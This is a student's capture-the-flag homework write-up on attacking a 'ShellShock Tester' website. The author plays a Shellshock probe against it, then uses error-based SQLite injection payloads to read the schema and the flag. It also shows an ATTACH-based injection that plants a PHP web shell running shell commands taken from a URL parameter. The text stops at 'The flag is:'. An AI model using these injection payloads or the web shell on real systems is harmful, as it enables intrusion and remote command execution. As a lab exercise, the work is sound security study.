ShellShock Writeup

Security Programming Homework 4-1

Problem Description

The ShellShock Tester is the website that have some vulnerabilites. According to the text on the website, the vulnerabilities might not be ShellShock :(

At the bottom of the website it says “The response will be collected into database”. Maybe SQL injection will work! After trying various types of SQL injection in that text input field I realized that I’m in the wrong way…

Look Deeper

The ShellShock Tester must send something to the target website to test if it has bash vulnerability. Using nc to see what are sent from the ShellShock Tester.

nc -l -p 5566

And it turns out to be the following result:

GET / HTTP/1.1
User-Agent: () { :;}; echo 'ShellShockTester_atdog';
Accept: */*

Ah-ha! The string { :;}; echo 'ShellShockTester_atdog'; is a typical method to test if the bash which is currently using is vulnerable to CVE-2014-6271. A system which is vulnerable will echo the string “ShellShockTester_atdog”. Similarly, the target website which runs CGI program will return the string if it is vulnerable. So why don’t we build a fake HTTP server to fool the ShellShock Tester?

Building a simple HTTP server using python module Flask. It returns the string when the ShellShock Tester queried for the index page. It seems that the ShellShock Tester stores the response returned from the target website into its database using insert. At the time the type of the database is still unknown.

So I append a single quote right after the string, and the result showed on the ShellShock Tester is:

DATABASE Msg: unrecognized token: "'ShellShockTester_atdog'')"

Response: ShellShockTester_atdog'

Google for the error message, it says that it seems to be SQLite 3. On the other hand, all error messages will showed means that we can use error-based SQL injection.

Error-based SQL Injection

Most of the error-based SQL injection methods are based on MySQL. But this time, it is SQLite… Fortunately, I found a forum post which talks about SQLite error-based injection, how lucky!

First, create a virtual table:


To know which table and column contain the flag:

SELECT * FROM t1 WHERE t1 MATCH '"'||(SELECT sql FROM sqlite_master);

And finally, the flag showed up:

SELECT * FROM t1 WHERE t1 MATCH '"'||(SELECT flag FROM oyoyoyoy_____1111flag);

The queries listed above should be embedded into the sophisticatedly crafted string. Using Python’s format string will look like this:

trick = 'ShellShockTester_atdog\'); {} --'
inj = 'create virtual table v1 using fts3(x);'
resp = trick.format(inj)

Inject a Backdoor

Another method to pwn the ShellShock Tester is to place a backdoor in the directory of the website.

trick = 'ShellShockTester_atdog\'); {} --'
inj = 'ATTACH \'./lol.php\' AS lol; CREATE TABLE lol.pwn (dataz TEXT); INSERT INTO lol.pwn (dataz) VALUES (\'<pre><?php system($_GET["cmd"]); ?></pre>\');'
resp = trick.format(inj)

This will build a backdoor called lol.php. So anyone can visit that page along with a “GET” argument cmd. The value of cmd could be any shell command. The reason is that ATTACH command will attach a SQLite database. If the database does not exist, it create the database which is a PHP file. The file’s content contains a short piece of PHP code showed above.

Simply visit the page http://tor.atdog.tw:8888/lol.php?cmd=ls, it will list every file in the current directory. And there is the SQLite database! Download it and grab the flag!


The flag is: